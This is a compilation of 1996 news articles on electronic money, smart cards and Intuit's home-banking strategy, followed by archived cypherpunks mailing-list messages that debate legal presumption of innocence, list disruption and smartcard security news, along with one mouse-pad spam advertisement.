by 60 Belgian banks, many industry observers said the dash for dominance
would now begin in earnest. Mondex, developed by National Westminster
Bank of London and owned by 17 banks worldwide, is to retain its board,
staff, and organizational structure, acting as an independent subsidiary.
 


Financial Times: Monday, November 18, 1996
 
Electronic Money Threat to Banks 
 
By George Graham
 
Central banks could lose billions of dollars of revenue if consumers
start to
jettison the traditional banknote in favour of electronic money,
economists
from the Bank for International Settlements have warned. 
 
A report issued today by the BIS, the central bankers' central bank, says
innovations such as "electronic purses" loaded on to a smart card or
"digital
cash" used for making payments over the Internet could erode central
banks'
income from issuing banknotes. 
 
Note issue is a significant source of revenue for many central banks
because
the private sector must in effect make interest-free deposits to obtain
the
notes. 
 
The BIS cites studies estimating the loss of this "seigniorage" at more
than
$17bn (#10.3bn) for its 11 member countries if prepaid cards were to
eliminate all banknotes below $25 in value, although not all seigniorage
comes to central banks. 
 
Central banks could "consider issuing e-money value themselves" as a way
of
offsetting the lost income, the BIS says. Alternatively, it suggests,
they could
increase mandatory reserve requirements, although this would run counter
to
the trend towards lower minimum reserves. 
 
The BIS report appeared as MasterCard, one of the world's two leading
payment card consortia, prepared to expand its efforts to develop a
widely
accepted electronic purse by taking control of Mondex, a UK-developed
smart card.
 
MasterCard will announce today it is taking a 51 per cent stake in
Mondex,
which is currently on trial in Swindon and Hong Kong. Widespread 
substitution of e-money for cash could make it more difficult for central
banks -- by reducing their ability to control the money supply -- to
affect interest rates. But the BIS says this is unlikely to happen.
 
The BIS report warns that if central banks chose to issue their own
e-money, they "could limit competition or reduce incentives to innovate".
While no restrictions are usually imposed on the issue of single-purpose
prepaid smart cards, such as telephone cards, multipurpose electronic
purses, which can be used as money in a variety of places, raise
different questions. 
 
Some central bankers view them as comparable to deposit accounts, which
in most countries can be managed only by authorised banks. Others see
them
as equivalent to travellers' cheques, on which few restrictions are
imposed. 
 
The BIS report warns that any decision will involve a trade-off: "If
issuance
of e-money is limited to banks, the regulatory framework already in place
can
be extended to cover the new products, but competition and innovation
might
be more limited."
 
 

 
 
Washington Post: Sunday, November 17, 1996
 
Smart Cards Deal Simpler Life for Cash-Phobes
 
By Jane Bryant Quinn
 
The next piece of plastic the banks think you ought to keep in your
wallet is a
smart card. These cards come in several varieties, and most aren't yet
ready
for mass distribution. But pilot projects are forging ahead--in Atlanta,
in New
York City early next year, in Canada and in several other countries. 
 
There's no obvious consumer need for smart cards today. But the bankers
believe that you're going to love them anyway. You may even be mailed one
and urged to try it. 
 
Smart card promoters make the assumption that you hate to carry cash. You
hate fishing for bills and coins to buy a newspaper or a soda. You'd put
down plastic, instead. 
 
This plastic card has money on it, embedded in a computer chip. A $20
card, for example, will give you $20 in spending power.
 

If you buy a 75-cent newspaper, the seller will put your card in a
special
terminal and drain off 75 cents. No identification or signature is
required. 
 
You now have a card with $19.25 left on it. After spending $1 on a soda,
the
value of your card goes down to $18.25. If you forget the amount, you can
check it with a little portable card reader. Some readers also might list
the
last five things you've bought. 
 
Don't confuse a smart card with a debit card. When you pay by debit card,
money is moved automatically from your bank account into the merchant's
bank account. With a smart card, however, you first move money from your
bank account onto the card's computer chip. When you buy something, the
money moves from your card to the merchant's terminal and then,
electronically, to the merchant's bank. 
 
If every merchant, street vendor, taxi driver and bus accepted smart
cards,
you wouldn't have to carry cash. To some, that would be a huge
convenience; to others, it's a shrug. As long as some merchants took
smart
cards and others didn't, however, you'd have to carry both. 
 
Smart cards come in three varieties, some of them more flexible than
others: 
 
- A prepaid, disposable single-purpose card. Telephone cards are a good
example. You pay $10 or $20 for a card, dial a toll-free number, give the
number of your card and then make your telephone call. Minute by minute,
the cost of the call is deducted from the value of the card. When you've
drained all the money out of the card, you throw it out. 
 
- A prepaid, disposable bank card. You buy the card at a bank and can use
it at any store that has a terminal. 
 
- A reloadable card. When your money runs out, you can take it to the
bank,
an ATM or a special kiosk and load it up again. Visa, MasterCard,
Citibank and the Chase Manhattan bank will jointly test a reloadable card
in
a section of New York City next year. A reloadable card could also serve
as
your credit card, debit card or ATM card. 
 
What's in it for the bank? Eventually (although not at first), the bank
probably
would charge you for the card. There might be a fee when you accessed the
ATM to load it up. The merchant also would pay a fee, in return for
getting
what is presumably a more secure transaction. 
 
What's in it for consumers? A very little bit of convenience. Putting
down a
card is a tad quicker than fishing out cash. You always have the
equivalent of
exact change. You wouldn't have to count your change (but you'd have to
use the card reader to be sure the merchant's terminal deducted the right
amount). You may or may not pay more for the card than it costs to get
cash
from an ATM. 
 
For a while, the smart cards probably won't have any more than $100 on
them, and the limit might be lower than that. So they're strictly for
walking-around money. You'd still need your credit card, debit card or
checkbook for more serious shopping. 
 
If the card malfunctions--say, it registers $14 when you're sure you were
carrying $36--the bank can check the balance on the computer chip, says
Ron Braco, a senior vice president at Chase Manhattan. But if you lose
the
card, it's just like losing cash. You're out the money. 
 
Promoters of smart cards blue-sky a lot of national and international
uses that
aren't yet anywhere in sight. I'll probably wait for them. Banks have a
sales
job to do on people like me who don't find it a nuisance to carry cash. 
 
 
U.S. Banker: November 18, 1996
 
Scott Cook Considers His Next Move 
 
By Joseph Radigan
 
Today's home banking market would be very different -- and a lot smaller
--
without Scott Cook's Intuit. But a stab at processing payments fizzled
out,
and some banks still suspect the company wants to steal their customers. 
 
The message boards at America Online's Motley Fool investment center may
be one of the quirkiest sources for stock tips, but then individual
investors
have always been magnets -- or suckers for unconventional advice. 
 
Anyone who logs on to AOL can find a breadth of opinions on a vast
number of publicly traded companies and funds. But in this forum -- where
sage financial advice often takes a back seat to the cyberspace
equivalent of
a food fight, there are no favorites -- not even Intuit Inc., the company
that
since its formation 13 years ago has quietly, steadily nursed its
innovative
home banking program, Quicken, from a cult classic into a consumer
software powerhouse. While this was taking place, bank after bank was
throwing up its hands in frustration over its inability to convince more
than a
handful of customers to do their banking by personal computer. Clearly,
Intuit founder and chairman Scott Cook, a former marketing guy from
Procter & Gamble Co., understood something about consumers' banking
habits that bankers themselves just didn't get. But lately that hasn't
bought 
the
company any favors with some of Motley Fool's regular visitors. 
 
On September 12th, just days before the company reported its results for
the
fiscal year, one posting exemplified the sentiments of a small group of
AOL
subscribers that had soured on Intuit's prospects: "The party is over,
kids.
There was never a chance that a $ 300-million company was going to
control
a multi-trillion-dollar business. To buy into that was nuts to begin
with. Those
who did, most at more than $ 65 a share, are getting a new lesson in
large-bank thinking today." 
 
To see Intuit trashed in an on-line foram is especially ironic. After
all, it 
was
one of Wall Street's hot software stocks just as the high-tech sector
began
soaring to undreamed of heights two years ago, and, thanks to a marketing
relationship with AOL, Quicken and its no-frills stablemate, BankNow, are
the banking options of choice for the on-line service's subscribers.
Plus,
Quicken has become the preferred financial management software among the

computer-literate, and that was what persuaded nearly three dozen banks
to
sign marketing relationships with the company in the last 18 months. 
 
But the last 12 months have been rough on Intuit's stock. The price
peaked
at $ 89.25 in November 1995, and since the beginning of the year, it's
been
caught in a steady downward spiral. By mid-September, when the company
released the earnings for its July fiscal year, the stock was wallowing
around
at barely $ 30 a share. The price rebounded slightly on the news that
Intuit
was selling its money-draining payment-processing unit, but that momentum
evaporated quickly. 
 
"The Street was clearly dropping the stock over the last six months,"
says
Genni Combes, a securities analyst for Hambrecht & Quist. "The back-end
processing was a big drain, and Quicken sales slowed." 
 
Cook still speaks regularly at trade shows, but his one-on-one contacts
with
the press are not as frequent as they once were. In a recent telephone
interview with U.S Banker, he said the stock's price gyrations had more
to
do with factors beyond his company's control than with the firm's
performance. A year ago, the stock market was caught up in its Internet
hysteria, and this spring, when Intuit's price started sliding, it was
primarily
because investors were finally evaluating on-line stocks with a healthy
dose of
much-needed logic. 
 
Whatever the actual cause of Intuit's share decline, the company still
has
plenty of fans. Most people posting messages on AOL are still bullish on
its
prospects, as are most of the professional analysts that follow the
company
for the big brokerage firms. 
 
"Their cash flow is tremendous," says David Farina, an analyst with
William
Blair & Co. in Chicago. Indeed, although Intuit confirmed some of the
worst
fears of its detractors by losing $ 20 million on $ 552 million in sales
during 
its
July 1996 fiscal year, the company did generate a cash flow of $ 44
million.
An important source of that cash flow is the nearly 10 million customers
of
Quicken, some of whom are almost fanatical in their enthusiasm for the
product. As recently as four years ago, Quicken was the whole franchise,
and while its market is still growing, it is now only 20% of the
company's
sales. Much of the firm's recent growth has come from its diversification
into
new markets. One is tax software. In acquiring the publisher of TurboTax,
the company has a product that now accounts for 30% of revenue. Another
important segment is small business accounting, where the QuickBooks
program contributes another 20%. These products will become even more
important to Intuit because the firm's strategy is to build upon
Quicken's
customer base by selling its regular users other programs like TurboTax. 
 
But in the wake of the announcement that the company was selling its
processing unit, Intuit Services Corp., or ISC (the sale is expected to
close in
December), the Menlo Park, CA, software publisher finds itself at what
may
be one of the most important junctures in its history. 
 
In the last year, Microsoft Money picked up market share against Quicken.
Cook says Quicken has recovered some of the ground it lost, but rarely
does
anyone best Bill Gates in a head-to-head shootout. 
 
Several of the three dozen banks that distribute Quicken have at best a
lukewarm commitment to promoting the software, and some would rather
pursue on-line banking strategies that circumvent Intuit. 
 
The on-line world, including that segment of the population that banks
with
Quicken, is rushing headlong toward the Internet, where only a few
companies have established brand names. Moreover, the companies that are
succeeding on the Internet tend not to be established technology firms
like

Microsoft or IBM Corp., but small start-ups devoted solely to doing
business on-line. 
 
Operating costs are rising faster than revenue. Expenses are not out of
control, but marketing in the on-line world challenges even the most
skilled
players, and that is forcing more software companies to steadily spend
more
on marketing and software development. Intuit is no exception. 
 
Revenues rose a healthy 32% last year to $ 552 million, but that rise was
outpaced by the nearly 40% jump in expenses for customer service,
marketing and research and development. And according to analysts like
Hambrecht's Combes, R&D will continue taking a big bite out of the
company's budget. 
 
"It takes tremendous tools to design products for the Internet, and you
have
to spend money on employees," says Combes. "Those costs have been
grossly underestimated" throughout the software industry. No Show
Stoppers None of the challenges confronting Intuit is a show-stopper --
and
some opinionated AOL subscribers notwithstanding, the party is definitely
not over but 1996 had more potholes than anyone could have predicted. The
more than $ 30 million spent on repairing ISC's operations was a big
drain on
management. Another problem has been the indifference, if not downright
hostility, displayed by some banks toward promoting Quicken. Cook now
says that in the wake of the ISC sale, that attitude is changing. Yet
there are
still banks that consider the company a threat. 
 
"The jury is still out on whether the consumer puts more value on the
software or the bank," says Tom Kunz, vice president for electronic
banking
at PNC Bank Corp. 
 
It's probably impossible for a final verdict to ever be reached on this
issue,
but because it's still undecided, some banks have ventured into
electronic
banking very gingerly. This unknown was at the heart of many banks'
suspicion of Microsoft's motives when it tried to buy Intuit, and it is
still
lurking as a possible scenario should cable TV firms and regional Bells
enter
the home banking market. Should banks surrender that brand-name
identification with their customers in some on-line markets, the fear is
that 
the
loss will snowball and lead toward depository institutions becoming mere
payment-shuffling middlemen. 
 
The desire to retain customers' loyalty has been behind some bankinspired
on-line ventures, such as the Internet bank, Security First Network Bank;
the
five-bank partnership that purchased Meca Software Inc. from H&R Block
Inc. and the announcement in September by 16 banks that they would
process home banking payments in a joint venture with IBM Corp. 
 
With Quicken, banks can promote their logos and brand names, but only
after a customer has intentionally purchased the package from a local
software store or bought a new computer with a copy of Quicken
pre-installed. Soon after a customer starts using the program, she can
establish an on-line connection between the bank and her home computer,
provided her bank has a marketing agreement with Intuit. In the last 18
months, some three dozen banks and thrifts have done so. Another 12,000
or so haven't. 
 
The objection bankers like PNC's Kunz have had is that even after the
on-line connection between the bank and the consumer is in place, the
consumer's electronic sessions still begin with them looking at a Quicken
logo. That has always raised the unwelcome prospect that customers would
show more brand-name loyalty to the software than to the bank, and so
even
some of the banks that have marketing contracts with Intuit are only
promoting Quicken half-heartedly. PNC, for example, makes the software
available only to customers who specifically ask for it, and Mike King,

director of alternative banking for Michigan National Bank in Farmington
Hills, MI, says his institution, despite its signing of a processing
agreement 
last
year, "didn't aggressively promote either" Quicken or Money. 
 
"You go into some banks and you have to practically put a gun to their
head"
to get a copy of Quicken, says Meca's president Paul Harrison. The reason
for that reluctance is that the banks that market Quicken are "clearly
cutting
themselves off from any cross-sell opportunity. You open the Intuit box,
and
you have to fill out the form, and the other side of that is an
application for 
an
Intuit credit card," issued by the Travelers Group's bank unit. 
 
Harrison is a direct competitor to Intuit, so it doesn't hurt him one bit
to 
point
out any disagreements between Intuit and the banks. But his point is also
borne out at the Internet site for the Quicken Financial Network, where
all of
the banks and brokerage firms that process payments through ISC are
listed,
although the listings are presented in a manner that doesn't distinguish
any one
bank from the others. Here too, along with lines for Chase Manhattan,
Citibank and Wells Fargo, there's a line for the Quicken Credit Card from
Travelers Bank and a second line for Travelers Bank. 
 
This credit card isn't all that significant, believes Jim Grant, a senior
vice
president for First Chicago NBD Corp. There are so many card offers from
so many issuers, and Intuit's is just one more. A technology company
could
hijack customers' loyalty, Grant allows, "but I just haven't seen any of
it."
He's felt for some time that the fears about Intuit's motives border on
paranoia. 
 
In the last two years, this issue of branding and positioning seemed to
have
become as much of a sore point for Cook as it has for the bankers who
accused him of hogging the market. Whenever he demonstrated Quicken at a
press briefing or a trade show, he was quick to point out the bank's logo
on
the computer screen. 
 
Cook readily acknowledges that Intuit is still trying to hang on to some
brand
name recognition, but he said that it's something of a false issue to
argue that
the Quicken logo should permanently evaporate once a customer has
selected a given on-line banking option. After all, brand names are
routinely
shared in more familiar markets.
 
"When customers walk into McDonald's, they know they're ordering
Coca-Cola," Cook says. What's so bad about applying the same logic to
on-line marketing? 
 
Cook also pointed out that if banks are hesitant to have direct marketing
relationships with Quicken because there are three dozen other banks
whose
names appear on the software program's menu, then those reluctant banks
are really going to be in for a rude awakening when Internet banking
soars off
the charts. Some 500 banks had Web pages by this fall, and if the market
forecasts are accurate, that number could increase five- or ten-fold in
the
next few years. He feels it's unfair to singled out Quicken for
committing
on-line disintermediation. 
 
Some bankers may never be reconciled to Cook's presence in their
business.
As long as somebody else is selling software to their customers, that
person,
whether it's Gates, Cook or someone else, they are going to be looked
upon
as interlopers who are trying to hog "ownership" of the customer
relationship.
A Matter of Ownership When NationsBank chief executive Hugh McColl
addressed a retail banking conference last December, he said, "I get
calls
every week from representatives of technology companies. They all swear
they don't intend to become banks. But they won't have to. With control
of
the medium, they ultimately gain the chance to own our customer
relationships." 
 

But Cook responds, "Owning the customer? I don't know what that means.
We found out with our ISC strategy, that when you don't allow the
customer
-- in this case our bank customer -- to have a choice, they're unhappy.
What
you want is to have the customer seek you out and want to do business
with
you." 
 
Although Cook seems a little bit wiser now, his prior insistence on banks
processing home banking payments through ISC if they wanted to distribute
Quicken only made it more difficult for him to overcome banks' suspicions
about the company's motives. 
 
"We know we need to play in Intuit's world," says PNC's Kurz. But
"there's
a difference between saying 'Connect to me, and I'll provide you this
service',
and saying, 'If you want to connect to me, you have to go through my
processor.'"
 
Throughout Intuit's history, someone who bought a copy of Quicken could
keep their checking account at any bank, and that's still true. In most
cases,
Quicken's customers print out specially formatted paper checks, which can
be ordered through a depositor's bank or directly from the firms that
provide
printed check stock. In 1990, Intuit formed a relationship with Checkfree
Corp. to sidestep the printing of paper checks and make payments
electronically. But less than 10% of its customers chose this option.
Then in
April 1994, Intuit entered the processing business itself when it
purchased
National Payments Clearinghouse for $ 7.6 million. Intuit wanted to use
NPC
for the background wiring for all of its on-line banking and investing
services,
and it was last year that NPC was rechristened Intuit Services Corp. 
 
But the plans never panned out. Intuit couldn't build the necessary
computer
systems quickly enough -- or well enough -- and more than $ 30 million in
R&D costs went down the drain before Cook and his management team
finally concluded they were wasting their time. Things hit bottom earlier
this
year, when some late and improperly filed payments caused a flurry of
stories
in the consumer press. Intuit finally announced the sale of the operation
to
Checkfree in September, for $ 227 million in stock. 
 
The biggest reason the ISC unit was sold, Cook freely acknowledges, was
bankers' unhappiness about having to go through ISC. Most banks prefer to
select a processor independent of their retail software. 
 
Converting home banking payments from paper to electronic form has been a
tough nut to crack for every entrant in the market, not just Intuit. But
Checkfree has had far more luck at it than anyone else. The company now
processes bills for 800,000 consumers, and it will pick up another
300,000
with ISC. About 40% of Checkfree's payments are completed electronically,
but chairman Peter Kight says the conversion process is time-consuming.
More than 40 employees from the Atlanta company are devoted to
marketing electronic payments to merchants and helping them adapt their
computer systems.
 
Still, as recently as a year ago, things looked bright for Intuit's ISC 
strategy.
Individual Quicken customers could still opt to have their payments
processed through Checkfree, but without a link between their bank and
ISC, these consumers didn't have electronic access to their bank
statements
and couldn't use Quicken to transfer balances among accounts. Since banks
had to join forces with ISC if they wanted to offer a complete service
through
Quicken, it appeared that Intuit could bend them to its will. But it
wasn't
meant to be.
 
With the sale of ISC, Intuit seems to have made a brilliant tactical
retreat. It
has hardly given up promoting its own brands, but it has finally
satisfied banks
that they're not going to be forced into doing business with a firm
that's 
intent
on stealing their customer lists. 

 
"The whole fear of Bill Gates or Scott Cook becoming a bank just went
away," says Frank Han, vice president for strategic planning for the $
28-billion-asset Union Bank of California. 
 
The sale coincided with the launch of a strategy called Open Exchange,
which is blueprint for connecting Quicken's users and banks to the
Internet.
In a way, it's a response to a similar strategy Microsoft announced last
March, called Open Financial Connectivity, and IBM's Integrion home
banking venture. 
 
At the very least, the sale of ISC and the proposal of Open Exchange
indicate a new pragmatism on Cook's part. Not long ago, some banks were
so eager for a link to Quicken that they would accept almost any product
distribution terms. But now does not seem to be a time when a hardball
strategy can work in home banking. Software companies like Intuit need
the
banks, the banks need the processing companies like Checkfree, and
everyone depends on everybody else's cooperation. Moreover, should any
of the players move in on one of the other's turf, they may wind up
losing
more than they gain. Intuit's experience with ISC is proof of that. "This
is a
very complex market," says Checkfree's Kight. "Everybody needs to focus."

 
For software companies like Intuit, that focus is now on gathering up as
many
customers as possible, even if it means giving the software away.
Publishers
like Intuit have discovered they can sell much more software by
distributing
packages directly to PC manufacturers, who then ship the software
programs
with every computer they sell. Unfortunately for the publishers, the
wholesale
revenue from this strategy is barely a fraction of that on copies sold
through
traditional retail outlets. But once these consumers have a copy of
Quicken,
Intuit believes it can sell them its other software. 
 
It's all part of a trend in high-tech markets that Citicorp's chief
technology
officer Colin Crook has called "non-linearity:" forsake the up-front
revenue
on your products now with the anticipation that customers will like what
they
see and pay extra for more valuable products down the road. Crook says
banks are going to have to understand this approach and employ it
themselves if they are to succeed in the on-line world. 
 
Intuit is staking its future on just this sort of non-linear approach. If
Cook
succeeds, he may yet find his detractors on the Motley Fool message
boards
eating their words.
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 20 Nov 1996 09:42:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Innocent until proven guilty
In-Reply-To: <199611200231.AAA16348@prometheus.hol.gr>
Message-ID: <v03007800aeb8f3907bb2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:36 AM -0600 11/20/96, snow wrote:
>> At 01:02 =EC=EC 19/11/1996 -0500, Clay Olbon II wrote:
>> >with _serious_ issues of 'unemployability'., FURTHERMORE people are NEVER
>> >guilty before PROVEN so. Guilt or Innocence is NOT a matter of 'opinion',
>
>    Huh? People are most certainly guilty before "proven" so, the government
>just isn't allowed to _assume_ their guilt, or to _act_ like they are guilty.
>
>     If you purchase LSD in America, you are guilty of a felony--Drug
>trafficing. Wether the court _finds_ you guilty or not is another story.

In this case, the putative crime is "drug trafficking" or "possession,"
depending. One is still presumed innocent until proven guilty. To wit, the
state must prove its case.

I rather suspect that any prosecutors or defense lawyers on this list will
confirm that an LSD case is hardly a case of "guilty until proven innocent."


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 20 Nov 1996 07:56:26 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: 1996 Codebreakers
In-Reply-To: <k50NXD29w165w@bwalk.dm.com>
Message-ID: <199611201612.KAA04390@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Adam Shostack <adam@homeport.org> writes:
> > 	I just got a review copy of the new (1996) ed. of Kahn's The
> > Codebreakers from my local used bookstore.  Its a little disapointing,
> ...
> > & DH.  Nothing on Cypherpunks, little on how privacy can be enhanced.
> Some folks have a very unrealistic opinion of their own importance.

      Yeah, we noticed. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 20 Nov 1996 10:33:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks State of Emergency
In-Reply-To: <199611201801.MAA19090@mail.execpc.com>
Message-ID: <v03007802aeb8fd80d18f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 AM +0000 11/20/96, Matthew J. Miszewski wrote:

>I have to agree.  One of the most impressive things I have seen as a
>modern "movement" (yes I realize cpunks are not an organized
>movement, relax) was the massive public relations job done by several
>core cpunks around the 1993 Clipper proposal.  People with largely
>divergent opinions found public ground in their opposition to
>Clipper.  Lets do that again.

Thanks, but I think the opposition to Clipper was very widespread, and
didn't nucleate around our group. (It is true that the "Wired" cover story
hit at the right time, and that 1993 was when a lot of journalists
"discovered" crypto, but it is also likely that this discovery would have
happened anyway, for lots of reasons.)

>[BTW, Tim, thanks for being willing to withstand the crap you go
>through.  You, and others on this list, have consistantly challenged
>and changed my assumptions about society, law and privacy.  I dont
>always agree with you.  But I am glad you are here.]

The messages denouncing me--or Gillmore, or Hughes, or whomever--are easy
to delete and/or filter. It is really the _list_ that is being affected,
not so much _me_. And I long ago gave up on any conceit that I could
control what others did to disrupt the list or did to cheapen the debate.
All I can influence is what I write in my essays, and I have tried to start
new threads on topics of interest to me.

Some call it being phlegmatic (look it up---unlike the word, "gullible,"
this one is actually in the dictionary). Nietzsche called it "amor
fati"--love of one's fate. Muslims and Buddhists put it in slightly
different ways. Whatever, the key is to transcend monkey troop anguish and
resentment over bad things said by others.

For the list's sake, I dislike the childlike rants of Vulis, Aga (Grubor),
Stathis, and others, just as I dislike the list-undermining megabytes of
rants a few years ago by Larry Dettweiler and his various pseudonyms. But I
can't stop them. So, I just filter them as best I can and get on with life.
If some newbies are "taken in" by their rantings, that's life. It ain't
always fair, and I can't worry too much that some newbie or some twit is
convinced by such rants. Nor can I worry that some people think I must be
guilty because I don't rant back at Vulis, Aga, Stathis, etc. (well, I try
not to rant back...sometimes I make some comments, as I'm doing here).

Not speaking for John Gillmore, but if someone is taken in by Aga's rants
about Gillmore being a "BAD FAGGOT, worthy of death," then I think of it as
evolution in action. Plonk.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 20 Nov 1996 08:03:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cracks Are Found In Smartcard Security (fwd)
Message-ID: <9611201602.AB22689@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Nov 96 at 15:36, Z.B. wrote:

> ---------- Forwarded message ----------
> Date: Tue, 19 Nov 1996 21:17:49 +0000
> From: Simon Gardner <simon@access.org.uk>
[snip]
> Subject: Cracks Are Found In Smartcard Security
> 
> Cracks Are Found In Smartcard Security
[snip] 
> Anderson said his latest research indicated that two of the world's most
> widely used systems for encoding sensitive financial information - the
> RSA and DES encryption standards used by most banks - could also be
^^^^^^^
> cracked easily."
^^^^^^^^^^^^^^^^^
> [The London Telegraph, 19th November 1996]

In what context?  (How does that applies to PGP? Did he say that for short 
keys used to encrypt data directly?)

Sorry for my cluelessness.

jfa
Jean-Francois Avon, Pierrefonds (Montreal) QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D : 152ACCBCD4A481B0 254011193237822C 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 20 Nov 1996 08:18:16 -0800 (PST)
To: dave@cave.gctech.co.jp (David Wuertele)
Subject: Re: US supporting dissidents? (was Re: Rogue Governments Issuing Policy Tokens)
In-Reply-To: <ygelobxjbm7.fsf@cave.gctech.co.jp>
Message-ID: <199611201613.LAA26977@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


"It is not enough to buy Intel, you must also learn to love Intel."

Besides, the Supremes have ruled that satire allows some degree of
copyright infringement.

Adam


David Wuertele wrote:
| "Timothy C. May" <tcmay@got.net> writes:
| > Time to dust off those "Big Brother Inside" stickers someone had printed up
| > a couple of years ago.
| 
| I know that Intel has succeeded in forcing the "Linux Inside" logo
| and stickers off the net on threats of trademark infringement suits.
| I have a feeling "Big Brother Inside" would make them even more upset.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Morence81@aol.com
Date: Wed, 20 Nov 1996 08:38:56 -0800 (PST)
Subject: Happy Holidays!!!
Message-ID: <961120111929_2048125050@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



---------------------
Forwarded message:
Subj:    For the Holidays...
Date:    96-11-20 09:26:40 EST
From:    Morence 81
To:      Morence 81

         Need a special gift to give your family, loved ones, or your friends
from the internet for the Holidays?  You can now send them a personalized
mouse pad printed by Morence Productions.  Simply by mailing a picture of any
size to us, we can scan it, using high quality full color scans, and print
them perfectly onto the mouse pad.  There are absolutely no restrictions on
the photos you can send.  We guarantee that we can scan it and print it onto
the mouse pad for you.  Send in a picture of your girlfriend, boyfriend,
favorite actor, singer, scenery, movie title, computer game, family
portraits..... the possibilities are endless.   Want to add words to your
picture on the mouse pad? No problem!!  Professional computer artists will
renderize fascinating 3D words onto the picture to give it a great effect.
Please take advantage of our great Holiday prices:

1 personalized mouse pad for just $15.00.   Each mouse pad you order after
that is only $10.00!!! No limit on the number of mouse pads you order.  If
you are dissatisfied with the mouse pad(s) after you receive them, simply
send
them back for a complete refund, no questions asked.

Here is all you have to do to get your personalized mouse pads:   Send in
your pictures that you want to be scanned to us (if there are small multiple
pictures that you want to all be printed onto just 1 mouse pad, please
explain in your order.) However you explain in your order how you want it
printed, it will be done.  Remember that the pictures can be any size, they
will automatically be resized to print perfectly on the mouse pad.   There is
no extra cost to get words printed on your mouse pad.  They will be placed
over the picture.  Just let us know in the order what you would like it to
say if anything.

There is a shipping and handling fee of $1.00 for each mouse pad.  The
pictures are returned with your purchase.

Please make checks or money orders to:  John Morence.

John Morence
c/o Morence Productions
2141 Glendale Galleria  #191
Glendale, CA  91210

If you have any questions, please email   <mousepad1@themall.net>
Or feel free to write to our address.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 20 Nov 1996 18:02:34 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: [NOISE] Want to know about this "aga" character? Read the Grubo
In-Reply-To: <gqmkXD7w165w@bwalk.dm.com>
Message-ID: <k51ky8m9L40G085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <gqmkXD7w165w@bwalk.dm.com>,
dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:


> Also read http://www.mindspring.com/~netscum/flaqu for more details on
> Alan, John, and their merry playmates.

Can't you get anything right?  The correct URL is

	http://www.mindspring.com/~netscum/idxflaqu.html

Alan "Proud to keep such distinguished company" Bostick

-- 
Alan Bostick               | You know those chemicals women have in them,
                           | when they've got PMS? Well, men have those very
mailto:abostick@netcom.com | same chemicals in them *all the time*.
news:alt.grelb             |           Margaret Atwood, THE ROBBER BRIDE
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 20 Nov 1996 11:44:40 -0800 (PST)
To: The Deviant <cypherpunks@toad.com
Subject: Re: How to slow the animals ...
Message-ID: <199611201944.LAA18259@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:00 AM 11/19/96 +0000, The Deviant wrote:
>On Mon, 18 Nov 1996, Ernest Hua wrote:
>
...
>> 3.  Re-order out-going mail (from toad.com) according to size.
>>     Drop messages from queue if it gets "reordered" too many times.
>> 
>
>nononononononono Bad Bad Thing.  If you start doing that, we'll start
>getting replies before messages _even more than we do now_.
I thought so too, at first.  As the long post won't be there to reply to,
replies can't beat the origional post to the e-mail box.

Consider, You replied to a post, until you got this post, you could not
reply to it.  When you got the origional post, most everyone else did as
well.  by delaying long posts, replies would be forced to come later.
However, if a person writes a long argument to a post, and that is delayed,
meantime, someone else writes another response which closely mirrors the
